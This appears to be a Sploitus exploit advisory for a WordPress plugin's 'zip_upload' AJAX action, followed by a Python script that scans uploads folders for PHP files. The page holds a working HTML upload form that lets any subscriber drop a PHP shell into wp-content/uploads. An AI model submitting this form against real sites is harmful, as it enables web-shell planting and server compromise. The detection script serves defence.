## https://sploitus.com/exploit?id=WPEX-ID:64BD22E2-EA38-4B6F-BE54-E81F9E77BDC2
The following form can be submitted by any authenticated user, such as a simple subscriber:

```html
<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="zip_upload"/>
    Zipped PHP File
    <input type="file" name="zipFile"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>
</html>
```


The extracted files will be in `wp-content/uploads/YEAR/MONTH/`, e.g. `wp-content/uploads/2022/01/shell.php`.
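
A defender-side sweep for the drop location described above, as an added example that is not part of the original advisory: it walks a WordPress uploads directory and reports PHP-executable files under the `YEAR/MONTH` folders. The function name, the extension list and the sample tree are assumptions made for this illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions that PHP handlers commonly execute (assumed list; adjust it
# to the web server's actual handler mapping).
PHP_EXTS = {".php", ".phtml", ".phar", ".php3", ".php4", ".php5", ".php7", ".pht"}
# WordPress date-based upload folders: uploads/YEAR/MONTH/
DATED_DIR = re.compile(r"^(19|20)\d{2}/(0[1-9]|1[0-2])$")


def find_php_in_uploads(uploads_root):
    """Return sorted relative paths of PHP-executable files found under
    uploads/YEAR/MONTH/, at any depth below the month folder."""
    root = Path(uploads_root)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        parts = path.relative_to(root).parts
        if len(parts) < 3 or not DATED_DIR.match("/".join(parts[:2])):
            continue
        # Check every suffix, lower-cased, so mixed case ("Shell.PHP") and
        # double extensions ("a.php.jpg") are reported as well.
        suffixes = {s.lower() for s in Path(parts[-1]).suffixes}
        if suffixes & PHP_EXTS:
            hits.append("/".join(parts))
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample tree; on a real host pass the site's
    # wp-content/uploads path instead.
    with tempfile.TemporaryDirectory() as tmp:
        for rel in ("2022/01/shell.php", "2022/01/photo.jpg", "2021/12/a.php.jpg"):
            p = Path(tmp) / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(b"")
        print(find_php_in_uploads(tmp))
```

Any hit deserves review, since media uploads normally contain no PHP; files outside the dated folders are not covered by this sweep.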